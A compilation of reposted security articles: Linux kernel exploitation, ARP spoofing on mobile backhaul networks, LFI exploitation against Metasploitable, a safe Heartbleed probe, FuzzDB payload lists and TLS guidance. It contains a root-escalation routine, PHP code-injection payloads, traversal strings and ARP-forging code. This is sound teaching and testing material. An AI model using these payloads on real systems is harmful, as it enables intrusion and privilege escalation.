The Linux kernel is made of code, it is software. And everyone knows that software has bugs and vulnerabilities. The Linux kernel is no exception. You will mostly find all the vulnerability classes you know from userland:
- stack based buffer overflows
- heap based buffer overflows
- race conditions
- integer signedness issues
- information leaks
- initialisation issues
- etc
And some different ones:
- NULL pointer dereferences
- stack overflows (real ones, not stack-based buffer overflows)
- process manipulation tricks (mempodipper)
- etc
__copy_to_user() and copy_to_user() are not the same: the first one doesn't check that the address effectively lives in userland, while the second one does. The goal of exploiting the kernel is mainly to get root.
[h=2]NULL Pointer Dereference[/h]
It was (is?) exploitable in the kernel simply because you could (can?) map the NULL page from your exploit, as it lives in userland. As such, the dereference doesn't crash.

[h=2]Heuristics[/h]
These are routines that give you good enough approximations. For instance, before 2.6.29, credentials were stored like this in the kernel:

/* Kernel 2.6.23 include/linux/sched.h */
struct task_struct {
    /* ... */
    /* process credentials */
    uid_t uid, euid, suid, fsuid;
    gid_t gid, egid, sgid, fsgid;
    struct group_info *group_info;
    kernel_cap_t cap_effective, cap_inheritable, cap_permitted;
    unsigned keep_capabilities:1;
    struct user_struct *user;
    /* ... */
};

As you can see, uid, euid and suid will generally have the same value. So if you set those values to 0, your process basically has root privileges. This heuristic is good enough, as there is little chance that you will find 3 dwords with the same value in memory (don't forget we start searching from our current task_struct, which represents our exploit process). Before 2.6.29, this routine was thus enough to get root:

// get root on pre-2.6.29 kernels
void get_root_pre_2_6_29 (void)
{
    uid_t uid, *cred;
    size_t byte;

    uid = getuid();
    cred = get_task_struct();
    if (!cred)
        return;

    for (byte = 0; byte < PAGE_SIZE; byte++) {
        if (cred[0] == uid && cred[1] == uid && cred[2] == uid) {
            cred[0] = cred[1] = cred[2] = cred[3] = 0;
            cred[4] = cred[5] = cred[6] = cred[7] = 0;
        }
        cred++;
    }
}

[h=2]Root in 3 big steps[/h]
You've basically got 3 big steps: prepare, trigger the vulnerability, trigger the payload.

[h=3]Prepare[/h]
This is the most important step, as it will greatly affect the reliability of your exploit. This is where you:
- check that the kernel is vulnerable
- use information leaks
- prepare the memory layout so you can reliably predict where your objects are
- place your shellcode in memory
The advantage of shellcoding in the kernel: it is in C.

[h=3]Trigger vulnerability[/h]
This is where you exploit your vulnerability.
Patching memory, pointers and so on.

[h=3]Trigger payload[/h]
This is where you escalate the privileges of your process. This is also where you fix the mayhem you may have caused earlier. It is REALLY important to fix the things you messed up, as otherwise the machine may crash later. It is done in the payload because the payload is executed in kernel mode. root is in userland, root != kernel land, don't get confused about that. After triggering the payload, you go back to userland and spawn your root shell or whatever. Ok, now that you have the basic understanding, you are ready for some kernel goodies.

[h=2]Linux Kernel Exploitation[/h]
I won't explain CVE-2009-2692 unless some people ask for it. It is simple enough to comprehend using the slides. Anyhow, let's dig into the TUN NULL pointer dereference.

[h=3]TUN NULL Pointer Dereference[/h]
This vulnerability is really interesting, as there is something special about it: the vulnerability is NOT in the source code. It is inserted at compilation. Basically, what happens is that tun is dereferenced before checking that tun is NULL. As such, GCC considers that the pointer doesn't need checking, since we use it before the check: GCC removes the NULL check. Boom, vulnerability. The vulnerable code:

static unsigned int tun_chr_poll(struct file *file, poll_table *wait)
{
    struct tun_file *tfile = file->private_data;
    struct tun_struct *tun = __tun_get(tfile);
    struct sock *sk = tun->sk;
    unsigned int mask = 0;

    if (!tun)
        return POLLERR;

    /* ... */

    if (sock_writeable(sk) ||
        (!test_and_set_bit(SOCK_ASYNC_NOSPACE, &sk->sk_socket->flags) &&
         sock_writeable(sk)))
        mask |= POLLOUT | POLLWRNORM;

    /* ... */

    return mask;
}

So the NULL check doesn't exist and tun is NULL. We can map the NULL page and we thus control tun->sk. We control sk->sk_socket->flags as well. test_and_set_bit() sets the last bit to 1. Bang, we can set any NULL pointer to 1. In the exploit, mmap() is chosen, as the TUN device doesn't have an mmap().
mmap() needs to be set to 1: even though we control the NULL page, internally mmap() is not called if the pointer is NULL. Put a trampoline at address 1 to jump over all the junk you've set up and go to your payload. And that's it, you've escalated your privileges.

[h=4]Why can't mmap() be NULL?[/h]
If you dig around in the kernel, here is what to look for:

// arch/x86/kernel/sys_x86_64.c:21
asmlinkage long sys_mmap(unsigned long addr, unsigned long len,
                         unsigned long prot, unsigned long flags,
                         unsigned long fd, unsigned long off)
{
    long error;
    struct file *file;

    error = -EINVAL;
    if (off & ~PAGE_MASK)
        goto out;

    error = -EBADF;
    file = NULL;
    flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
    if (!(flags & MAP_ANONYMOUS)) {
        file = fget(fd);
        if (!file)
            goto out;
    }

    down_write(&current->mm->mmap_sem);
    error = do_mmap_pgoff(file, addr, len, prot, flags, off >> PAGE_SHIFT);
    up_write(&current->mm->mmap_sem);

    if (file)
        fput(file);
out:
    return error;
}

If you go down into do_mmap_pgoff(), you end up finding this code:

// mm/mmap.c
/* ... */
if (!file->f_op || !file->f_op->mmap)
    return -ENODEV;
break;
/* ... */

So here it is: if mmap() is NULL, it doesn't get called. That is why the exploit sets the mmap() pointer to 1.

[h=2]Other exploits[/h]
This is where it gets pretty hard to explain, as there is still tons of code to read x). I dug a bit into the vmsplice, RDS and perf_events exploits. vmsplice uses a buffer overflow, but it's not a common one, as it doesn't overwrite any function or return pointers. What it overwrites are compound page addresses (values we don't control), and then a dtor pointer the attacker controls gets called. Privileged code execution is gained in put_compound_page() through the call of a destructor function pointer that we control. This dtor pointer obviously points to the attacker's payload. At the end of the article, I've attached some analysis I did for vmsplice. There is a lot of code to cover though, so I won't detail it in this post.
I haven't thoroughly analyzed the RDS exploit yet, but it is a write-what-where. The perf_events exploit is really interesting. It 'basically' increments the upper bytes of an interrupt handler pointer (on 64 bits) so that the pointer ends up in userland. The exploit then returns to this allocated memory containing the payload. The exploit also uses a neat trick to compute the perf_event array address. An entire post would be necessary to properly understand this exploit; analyses have already been done by other people anyhow.

[h=2]The challenge[/h]
The VM is a 64 bit Linux system made especially by Jason Donenfeld (aka zx2c4). The vulnerability allows us to write a 0 anywhere in kernel memory. As such, in my exploit, I zeroed out part of a proto_ops function pointer, mmap()ed the resulting address, put my payload over there, jumped to it and fixed things up. I debugged the exploit using the register information shown when the exploit crashed. The exploit is included in the archive below.

[h=2]Conclusion[/h]
As you can see, kernel exploitation has some similarities with userland exploitation. The differences mainly stem from the protections and the impact that a bug can have. For instance, in kernel land, not fully initializing a structure can have severe consequences (code execution through a NULL pointer dereference, etc.), while in userland it may cause an infoleak but not directly code execution. Moreover, this also shows that the kernel is a piece of software and is as such exploitable.
Hope you enjoyed the article, I welcome any feedback on it.

Cheers,

m_101

[h=2]References[/h]
- The slides : here
- Jason Donenfeld's challenge : here
- sgrakkyu's blog : kernelbof
- Attacking the Core : Kernel Exploiting Notes
- "A Guide to Kernel Exploitation: Attacking the Core" by Enrico Perla and Massimiliano Oldani
- Miscellaneous exploits : NULL deref sendpage, NULL deref /dev/net/tun, vmsplice, RDS write-what-where, integer problem perf_swevent
- MISC article explaining the perf_swevent exploit : Misc 69

Sursa: Binary world for binary people : December HZV Meet : Linux Kernel Exploitation
-
[h=3]Unusual 3G/4G Security: Access to a Backhaul Network[/h]A backhaul network is used to connect base stations (known as NodeB in 3G terminology) to a radio network controller (RNC). Connection costs for base stations comprise a significant part of a provider's total expenses, so it is reasonable to reduce the costs of building and running such networks, in particular by implementing new technologies. The evolution went from ATM connections to SDH/SONET, DSL, IP/MPLS and metro Ethernet. Today traffic is carried in IP packets. Given a large metro network, we just can't use it for base station connections only. So it also provides channels to legal entities, and in some areas it provides home users with Internet access. A converged network, as it were. And security is a pressing issue when it comes to converged networks. Voice and GPRS packet data are transmitted in encrypted form over the network section between a NodeB and an RNC. But what about management traffic? What protocols are used to manage the NodeB directly? Depending on the provider's choice, it may be HTTP/HTTPS, Telnet/SSH, or different types of MML (a man-machine language). Unfortunately, protocols that do not encrypt data are often used to manage network elements. What happens if an intruder gets access to a network segment? Is he able to capture data in this case? How will he do it? At present, each device has an IP management interface and an Ethernet port to connect to a network. Base stations are no exception. Upon intrusion into a network, an attacker can use common ARP spoofing to capture the data that technicians use to manage network devices. An example of an MML session shows how simple it is. As you go further, you will understand it really is a problem. After getting access to one base station, it is possible to break into other stations, since management IP addresses are freely routed, at least within one network.
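The ARP spoofing mentioned above needs nothing exotic: a forged ARP reply is a 42-byte frame. A sketch of building one with only the standard library follows (the MAC/IP values are illustrative, and actually sending such a frame would require a raw socket and appropriate privileges):

```python
import struct

def build_arp_reply(attacker_mac, victim_mac, spoofed_ip, victim_ip):
    # Ethernet II header: destination MAC, source MAC, EtherType 0x0806 (ARP)
    eth = victim_mac + attacker_mac + struct.pack(">H", 0x0806)
    # ARP header: htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, op=2 (reply)
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, 2)
    # Sender MAC/IP (the lie: attacker's MAC claims the spoofed IP), then target MAC/IP
    arp += attacker_mac + spoofed_ip + victim_mac + victim_ip
    return eth + arp

frame = build_arp_reply(b"\xaa" * 6, b"\xbb" * 6,
                        bytes([10, 0, 0, 1]), bytes([10, 0, 0, 77]))
print(len(frame))  # 42
```

On a flat management segment with no 802.1X or dynamic ARP inspection, a stream of such replies is enough to put the attacker in the middle of a technician's Telnet or MML session.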
Note: a mobile provider has hundreds of base stations in each city. What if it loses connection with one of them or has to execute works on site? For these purposes, there is a local account on the device. Such an account is usually the same on all devices, which means that an intruder can get control over hundreds of devices. A telephone network used to be an extremely isolated and controlled system. It seems that times have changed. The question is whether telecommunication companies realize that. Author: Dmitry Kurbatov, Positive Research Sursa: Positive Research Center: Unusual 3G/4G Security: Access to a Backhaul Network
-
[h=3]LFI Exploitation : Basics, code execution and information leak [/h]Hello,

Today, I played a bit with Metasploitable 2. It is really easy to root, so that's not the point of this blog post. Anyhow, I played around a bit and I ended up coding a basic LFI exploitation tool. So, yet another post on LFI exploitation ...

[h=2]So what is LFI?[/h]
LFI stands for Local File Inclusion. It is a vulnerability that allows you to include local files. Many people think that it's not really dangerous, as it only includes LOCAL files. Unfortunately (depending on which side of the barrier you are ...), that is false: you can execute code through an LFI.

[h=2]So, how do you exploit it?[/h]
By including local files. Yes, local files. These are the well-known techniques for LFI:
- apache logs
- /proc/self/environ
- php://input
- NULL byte injection
- path truncation
- directory traversal
- PHP filters
- image inclusion with PHP code

[h=3]Apache logs[/h]
These were publicly accessible in old distros. Now, they are only readable by proper users. You'd basically inject PHP code through GET requests:

http://victim/<?php system ('id'); ?>

This would leave PHP code in the logs. Then executing the PHP code is as simple as:

http://victim/?page=/var/log/apache2/access_log

Code execution if there are no proper rights on the logs (some old systems remain).

[h=3]/proc/self/environ[/h]
This file is interesting, as it stores stuff like your USER-AGENT. So, if you change your User-Agent to

<?php system ('id'); ?>

and use this:

http://victim/?page=/proc/self/environ

Yes, code execution!

[h=3]php://input[/h]
Ok, this one executes PHP code included in the POST data.
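A minimal sketch of the /proc/self/environ trick described above in Python (the target URL is illustrative and nothing is sent here; you'd hand the request to urlopen against a host you are authorized to test):

```python
import urllib.request

# Plant PHP code in the User-Agent header, then include /proc/self/environ
# through the LFI so the server interprets it. The target URL is illustrative.
def environ_lfi_request(base_url, cmd):
    url = base_url + "/proc/self/environ"
    payload = "<?php system('" + cmd + "'); ?>"
    return urllib.request.Request(url, headers={"User-Agent": payload})

req = environ_lfi_request("http://victim/?page=", "id")
print(req.full_url)                  # http://victim/?page=/proc/self/environ
print(req.get_header("User-agent"))  # <?php system('id'); ?>
```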
[h=3]NULL byte injection and path truncation[/h]
This one is pretty neat. Say you have the following code:

<?php include ($_GET['page'] . '.php'); ?>

Well, you can get rid of the '.php' extension using this trick. Just append loooots of . or /. characters: the path gets normalized and voila, no more extension. NULL byte poisoning doesn't work for PHP >= 5.3.4, as it's been fixed. Reverse path truncation is mostly the same, except the ../ sequences come before the file name.

[h=3]PHP filters[/h]
This technique is mainly for leaking files (.php and others). It doesn't work if you have a prefix, such as here:

<?php include ($prefix . $_GET['page'] . '.php'); ?>

You exploit it using this request, for instance:

http://victim/?page=php://filter/read=convert.base64-encode/resource=index.php

As you guessed, the PHP filter is

php://filter/read=convert.base64-encode/resource=

[h=3]Image with PHP code[/h]
This one is about appending PHP code to an image. Using the image in the LFI allows you to inject PHP code: the PHP interpreter interprets anything as code as long as it's inside <?php ?>. If you have an LFI that is not exploitable through /proc/self/environ or the Apache logs, and no extension is concatenated, this can still allow you to exploit it if you are able to upload images. Let's say you have phpBB and PhpLdapAdmin 1.1.0.5. Well, you can upload an image using phpBB, then exploit the LFI in PhpLdapAdmin using the directory traversal trick => code execution.

[h=2]Exploit[/h]
I wrote a basic LFI exploitation tool that uses the PHP filter or /proc/self/environ tricks. You can get it at LFI exploit tool . The code isn't clean and it needs tons of improvement before really being a usable tool.
I plan on improving it on an as-needed basis. The cookie functionality is not implemented yet; it is just a placeholder for now. You can test it on Mutillidae on Metasploitable 2. I haven't tested it anywhere else yet. Example of use (this is on Metasploitable 2):

$ ./exploit-lfi.py -h
usage: exploit-lfi.py [-h] --url URL [--action ACTION] --option OPTION
                      [--replace REPLACE] [--cookie COOKIE]

Exploit LFI

optional arguments:
  -h, --help            show this help message and exit
  --url URL, -u URL     URL to attack
  --action ACTION, -a ACTION
                        exec or read (default)
  --option OPTION, -o OPTION
                        Action argument
  --replace REPLACE, -r REPLACE
                        string to replace
  --cookie COOKIE, -c COOKIE
                        Cookie

$ ./exploit-lfi.py -u 'http://192.168.56.107/mutillidae/index.php?page=show-log.php' -o 'cat /etc/passwd'
[+] Checking vulnerability
Test url : http://192.168.56.107/mutillidae/index.php?page=whatever&
Is vulnerable with param page!
[+] Found vulnerability, new URL : http://192.168.56.107/mutillidae/index.php?page=PAYLOAD&
[+] Searching for root path
root : ../../../
[+] New URL : http://192.168.56.107/mutillidae/index.php?page=../../../PAYLOAD&
[+] Testing : {'path': '/proc/self/environ', 'type': 'header'}
http://192.168.56.107/mutillidae/index.php?page=../../..//proc/self/environ&
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false

[h=2]Conclusion[/h]
As you can see in this introduction, code execution is quite possible with an LFI. These aren't only information leak vulnerabilities. That's all for today.

Cheers,

m_101

Updates
- 18/12/2013 : the LFI exploit tool I wrote has been moved to its own repository : https://github.com/m101/lfipwn/ and the cookie functionality does work.

[h=2]References[/h]
- Basics on file inclusion : File Inclusion - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools
- PhpLdapAdmin LFI : phpldapadmin Local File Inclusion
- path truncation part 1 : ush.it - a beautiful place
- path truncation part 2 : ush.it - a beautiful place

Sursa: Binary world for binary people : LFI Exploitation : Basics, code execution and information leak
-
Testing for Heartbleed vulnerability without exploiting the server.

Heartbleed is a serious vulnerability in OpenSSL that was disclosed on Tuesday, April 8th, and impacted any sites or services using OpenSSL 1.0.1 – 1.0.1f and 1.0.2-beta1. Due to the nature of the bug, the only obvious way to test a server for the bug was an invasive attempt to retrieve memory, and this could lead to the compromise of sensitive data and/or potentially crash the service. I developed a new test case that neither accesses sensitive data nor impacts service performance, and am posting the details here to help organizations conduct safe testing for Heartbleed vulnerabilities. While there is a higher chance of a false positive, this test should be safe to use against critical services. The test works by observing a specification implementation error in vulnerable versions of OpenSSL: they respond to larger than allowed HeartbeatMessages.

Details: OpenSSL was patched by commit 731f431. This patch addressed 2 implementation issues with the Heartbeat extension:
1. HeartbeatRequest message specifying an erroneous payload length
2. Total HeartbeatMessage length exceeding 2^14 (16,384 bytes)

Newer versions of OpenSSL silently discard messages which fall into the above categories. It is possible to detect older versions of OpenSSL by constructing a HeartbeatMessage and not sending padding bytes. This results in the below evaluating true:

/* Read type and payload length first */
if (1 + 2 + 16 > s->s3->rrec.length)
    return 0; /* silently discard */

Vulnerable versions of OpenSSL will respond to the request. However, no server memory will be read, because the client sent payload_length bytes.
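Such a probe can be sketched in a few lines. The field layout follows RFC 6520; the function name and the TLS version constant are my own choices, not taken from the post:

```python
import struct

def build_safe_heartbeat_probe(tls_version=0x0302):  # 0x0302 = TLS 1.1
    # HeartbeatMessage with type=request (1), payload_length=0 and NO padding.
    # Patched OpenSSL silently discards it, since 1 + 2 + 16 exceeds the
    # 3-byte record length; vulnerable versions respond. Either way, the
    # declared payload_length matches what was sent, so no memory is leaked.
    hb = struct.pack(">BH", 0x01, 0)
    # TLS record header: content type 24 (heartbeat), version, length
    return struct.pack(">BHH", 0x18, tls_version, len(hb)) + hb

print(build_safe_heartbeat_probe().hex())  # 1803020003010000
```

Sending this record after a completed handshake and watching for any heartbeat response is the non-invasive check.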
False positives may occur when all the following conditions are met (but it is unlikely):
- The service uses a library other than OpenSSL
- The library supports the Heartbeat extension
- The service has Heartbeat enabled
- The library performs a fixed length padding check similar to OpenSSL

False negatives may occur when all the following conditions are met, and can be minimized by repeating the test:
- The service uses a vulnerable version of OpenSSL
- The Heartbeat request isn't received by the testing client

I have modified the Metasploit openssl_heartbleed module to support the 'check' option. You can download the updated module at https://github.com/dchan/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb

We hope you can use this to test your servers and make sure any vulnerable ones get fixed!

David Chan
Mozilla Security Engineer

Sursa: https://blog.mozilla.org/security/2014/04/12/testing-for-heartbleed-vulnerability-without-exploiting-the-server/
-
Using FuzzDB for Testing Website Security

After posting an introduction to FuzzDB, I received the suggestion to write more detailed walkthroughs of the data files and how they can be used during black-box web application penetration testing. This article highlights some of my favorite FuzzDB files and discusses ways I've used them in the past. If there are particular parts or usages of FuzzDB you'd like to see explored in a future blog post, let me know.

Exploiting Local File Inclusion

Scenario: While testing a website you identify a Local File Inclusion (LFI) vulnerability. Considering the various ways of exploiting LFI bugs, there are several pieces of required information that FuzzDB can help us to identify. (There is a nice cheatsheet here: Exploiting PHP File Inclusion – Overview | Reiners' Weblog)

The first is directory traversal: How far to traverse? How do the characters have to be encoded to bypass possible defensive relative path traversal blacklists, a common but poor security mechanism employed by many applications? FuzzDB contains an 8 directory deep set of directory traversal attack patterns using various exotic URL encoding mechanisms: https://code.google.com/p/fuzzdb/source/browse/trunk/attack-payloads/path-traversal/traversals-8-deep-exotic-encoding.txt

For example:
/%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae/{FILE}

In your fuzzer, you'd replace {FILE} with a known file location appropriate to the type of system you're testing, such as the string "etc/passwd" (for a UNIX system target), then review the returned responses to find ones indicating success, i.e., that the targeted file has been successfully retrieved. In terms of workflow, try sorting the responses by number of bytes returned; the successful response will most likely become immediately apparent.
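That workflow can be sketched as follows; the plain `../` payloads and the base URL here are illustrative stand-ins for the FuzzDB file:

```python
# Generate candidate LFI URLs from traversal payloads by substituting the
# {FILE} placeholder, as FuzzDB's lists expect. Payloads and URL are illustrative.
payloads = ["../" * depth + "{FILE}" for depth in range(1, 9)]

def make_urls(base, target_file):
    return [base + p.replace("{FILE}", target_file) for p in payloads]

urls = make_urls("http://victim/?page=", "etc/passwd")
print(urls[0])    # http://victim/?page=../etc/passwd
print(len(urls))  # 8
```

Feed each URL to your HTTP client, record the response sizes, and sort: the hit that actually returned /etc/passwd stands out from the uniform error pages.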
The cheatsheet discusses a method of including injected PHP code, but in order to do this, you need to be able to write to the server's disk. Two places that the HTTPD daemon would typically have write permissions to are the access and error logs. FuzzDB contains a file of common locations of HTTP server log files culled from popular distribution packages. After finding a working traversal string, configure your fuzzer to try these file locations, appended to the previously located working directory path: https://code.google.com/p/fuzzdb/source/browse/trunk/attack-payloads/lfi/common-unix-httpd-log-locations.txt

Fuzzing for Unknown Methods

Improper Authorization occurs when an application doesn't validate whether the current user context has permission to perform the requested command. One common presentation is in applications which utilize role-based access control, where the application uses the current user's role to determine which menu options to display, but never validates that the chosen option is within the current user's allowed permission set. Using the application normally, a user would be unlikely to select an option they weren't allowed to use, because it would never be presented. If an attacker were to learn these methods, they'd be able to exceed the expected set of permissions for their user role.

Many applications use human-readable values for application methods passed in parameters. FuzzDB contains a list of common web method names that can be fuzzed in an attempt to find functionality that may be available to the user but is not displayed by any menu: https://code.google.com/p/fuzzdb/source/browse/trunk/attack-payloads/BizLogic/CommonMethods.fuzz.txt

These methods can be injected wherever you see others being passed, such as in GET and POST request parameter values, cookies, serialized requests, REST URLs, and web services.
Protip: In addition to this targeted brute-force approach, it can also be useful to look inside the site's Javascript files. If the site designers have deployed monolithic script files that are downloaded by all users regardless of permissions, while the application pages displayed to a user only call the functions permitted for the current user role, you can sometimes find endpoints and methods that you haven't observed while crawling the site.

Leftover Debug Functionality

Software sometimes gets accidentally deployed with leftover debug code. When triggered, the results can range from extended error messages that reveal sensitive information about the application state or configuration (useful for planning further attacks), to bypassing authentication and/or authorization, to displaying additional test functionality that could violate the integrity or confidentiality of data in ways the developers didn't intend to occur in production.

FuzzDB contains a list of debug parameters that have been observed in bug reports, in my own experience, and some which are totally hypothesized by me but realistic: https://code.google.com/p/fuzzdb/source/browse/trunk/attack-payloads/BizLogic/DebugParams.fuzz.txt

Sample file content:
admin=1
admin=true
admin=y
admin=yes
adm=true
adm=y
adm=yes
dbg=1
dbg=true
dbg=y
dbg=yes
debug=1
debug=true
debug=y
debug=yes

"1", "true", "y" and "yes" are the most common values I've seen. If you observe a different but consistent scheme in use in the application you're assessing, plug that in. In practice, I've had luck using them as name/value pairs in GET requests, POST requests, and cookies, and inside serialized requests, in order to elicit a useful response (for the tester) from the server.
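A sketch of spraying those pairs across the three injection points (the parameter list is a truncated excerpt, the URL and request structure are illustrative, and you'd hand each entry to your HTTP client of choice):

```python
from urllib.parse import urlencode

# A few entries in the spirit of DebugParams.fuzz.txt (truncated excerpt).
debug_params = ["debug=1", "debug=true", "admin=1", "dbg=1"]

def inject_candidates(base_url):
    # For each candidate pair, emit a GET query-string variant,
    # a POST body variant and a cookie variant.
    out = []
    for pair in debug_params:
        name, value = pair.split("=", 1)
        out.append({"method": "GET", "url": base_url + "?" + urlencode({name: value})})
        out.append({"method": "POST", "url": base_url, "data": {name: value}})
        out.append({"method": "GET", "url": base_url,
                    "headers": {"Cookie": name + "=" + value}})
    return out

reqs = inject_candidates("http://victim/app")
print(len(reqs))  # 12
```

Diffing the responses against a baseline request quickly surfaces any parameter that changed the application's behavior.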
Predictable File Locations

Application installer packages place components into known, predictable locations. FuzzDB contains lists of known file locations for many popular web servers and applications: https://code.google.com/p/fuzzdb/source/browse/trunk/#trunk%2Fdiscovery%2FPredictableRes

Example: You identify that the server you're testing is running Apache Tomcat. A list of common locations for interesting default Tomcat files is used to identify information leakage and additional attackable functionality: https://code.google.com/p/fuzzdb/source/browse/trunk/discovery/PredictableRes/ApacheTomcat.fuzz.txt

Example: A directory called /admin is located. Sets of file lists are deployed which will aid in identifying resources likely to be in such a directory: https://code.google.com/p/fuzzdb/source/browse/trunk/discovery/PredictableRes/Logins.fuzz.txt

Forcible Browsing for Potentially Interesting Files

Certain operating systems and file editors can inadvertently leave backup copies of sensitive files. This can end up revealing source code, pages without any inbound links, credentials, compressed backup files, and who knows what else. FuzzDB contains hundreds of common file extensions, including one hundred eighty-six compressed file format extensions, extensions commonly used for backup versions of files, and a set of "COPY OF" primitives as can be prepended to file names by Windows servers: https://code.google.com/p/fuzzdb/source/browse/#svn%2Ftrunk%2Fdiscovery%2FFilenameBruteforce

In practice, you'd use these lists in your fuzzer in combination with file names and paths discovered while crawling the targeted application. Upcoming posts will discuss other usage scenarios.

Sursa: https://blog.mozilla.org/security/2014/03/25/using-fuzzdb-for-testing-website-security/
-
[h=1]Navigating the TLS landscape[/h] A few weeks ago, we enabled Perfect Forward Secrecy on https://www.mozilla.org [1]. Simultaneously, we published our guidelines for configuring TLS on the server side. In this blog post, we want to discuss some of the SSL/TLS work that the Operations Security (OpSec) team has been busy with.

For operational teams, configuring SSL/TLS on servers is becoming increasingly complex. BEAST, LUCKY13, CRIME, BREACH and RC4 are examples of a fast-moving security landscape that made recommendations from only a few months ago already obsolete. Mozilla’s infrastructure is growing fast. We are adding new services for Firefox and Firefox OS, in addition to an ever increasing number of smaller projects and experiments. The teams tasked with deploying and maintaining these services need help sorting through known TLS issues and academic research. So, for the past few months, OpSec has been doing a review of the state of the art of TLS. This is in parallel and complementary to work by the Security Engineering team on cipher preferences in Firefox, the end goal being to support, at the infrastructure level, the security features championed by Firefox.

We published our guidelines at https://wiki.mozilla.org/Security/Server_Side_TLS. The document is a quick reference and a training guide for engineers. There is a strong demand for a standard ciphersuite that can be copied directly into configuration files. But we also wanted to publish the building blocks of this ciphersuite, and explain why a given cipher is preferred over another. These building blocks are the core of the ciphersuite discussion, and will be used as references when new attacks are discovered.

Another important aspect of the guideline is the need to be broad: we want people to be able to reach https://mozilla.org and access Mozilla’s services from anywhere. For this reason, SSLv3 is still part of the recommended configuration.
However, ciphers that are deprecated and no longer needed for backward compatibility are disabled. DSA ciphers are included in the list as well, even though almost no one uses DSA certificates right now; some might in the future.

At the core of our effort is a strong push toward Perfect Forward Secrecy (PFS) and OCSP stapling. PFS improves secrecy in the long run, and will become the de facto choice in all browsers. But it comes with new challenges: the handshake takes longer, due to the key exchange, and a new parameter (dhparam/ecparam) is needed. Ideally, the extra parameter should provide the same level of security as the RSA key does. But we found that old client libraries, such as Java 6, are not compatible with larger parameter sizes. This is a problem we cannot solve server-side, because the client has no way to tell the server which parameter sizes it supports. As a result, the server will start the PFS handshake, and the client will fail in the middle of the handshake. Without a way for the handshake to fall back and continue, we have to use smaller parameter sizes until old libraries can be deprecated.

OCSP stapling is a big performance improvement. OCSP requests to third-party resolvers block the TLS handshake, directly impacting the user’s perception of page opening time. Recent web servers can now cache the OCSP response and serve it directly, saving the client the round trip to the OCSP responder. OCSP stapling is likely to become an important feature of browsers in the near future, because it improves performance and reduces the cost of running worldwide OCSP responders for Certificate Authorities.

OpSec will maintain this document by keeping it up to date with changes in the TLS landscape. We are using it to drive changes in Mozilla’s infrastructure. This is not a trivial task, as TLS is only one piece of the complex puzzle of providing web connectivity to large websites.
We found that very few products provide the full set of features we need, and most operating systems don’t provide the latest TLS versions and ciphers. This is a step forward, but it will take some time until we provide first-class TLS across the board.

Feel free to use, share and discuss these guidelines. We welcome feedback from the security and cryptography communities. Comments can be posted on the discussion section of the wiki page, submitted to the dev-tech-crypto mailing list, posted on Bugzilla, or in #security on IRC. This is a public resource, meant to improve the usage of HTTPS on the Internet.

Sursa: https://blog.mozilla.org/security/2013/11/12/navigating-tls/
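To illustrate the PFS point above: in the OpenSSL naming scheme, whether a ciphersuite offers forward secrecy can be read off its key-exchange prefix (ECDHE/DHE versus plain RSA key transport). The sketch below is a deliberately simplified classifier, not a substitute for the Server Side TLS guideline itself, and the live-server helper assumes network access with an illustrative hostname.

```python
import socket
import ssl

# Simplified rule of thumb: DHE/ECDHE key exchanges provide forward
# secrecy, static RSA key transport does not. (TLS 1.3 suite names use a
# different scheme; real policy should follow the Mozilla guideline.)
def has_forward_secrecy(cipher_name):
    return cipher_name.startswith(("ECDHE-", "DHE-", "EDH-"))

# Optional: inspect what a live server actually negotiates. The hostname
# is an illustrative placeholder, and this obviously needs network access.
def negotiated_cipher(host, port=443):
    ctx = ssl.create_default_context()
    with ctx.wrap_socket(socket.create_connection((host, port)),
                         server_hostname=host) as s:
        return s.cipher()[0]  # e.g. 'ECDHE-RSA-AES128-GCM-SHA256'

print(has_forward_secrecy("ECDHE-RSA-AES128-GCM-SHA256"))  # True
print(has_forward_secrecy("AES256-SHA"))                   # False: static RSA
```

Combined, the two functions give a quick self-check of whether a deployment actually lands on a PFS suite for modern clients.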
-
[h=1]Backdoor exploit discovered in Samsung Galaxy[/h] Posted by: FastFlux March 13, 2014 in Mobile, Security

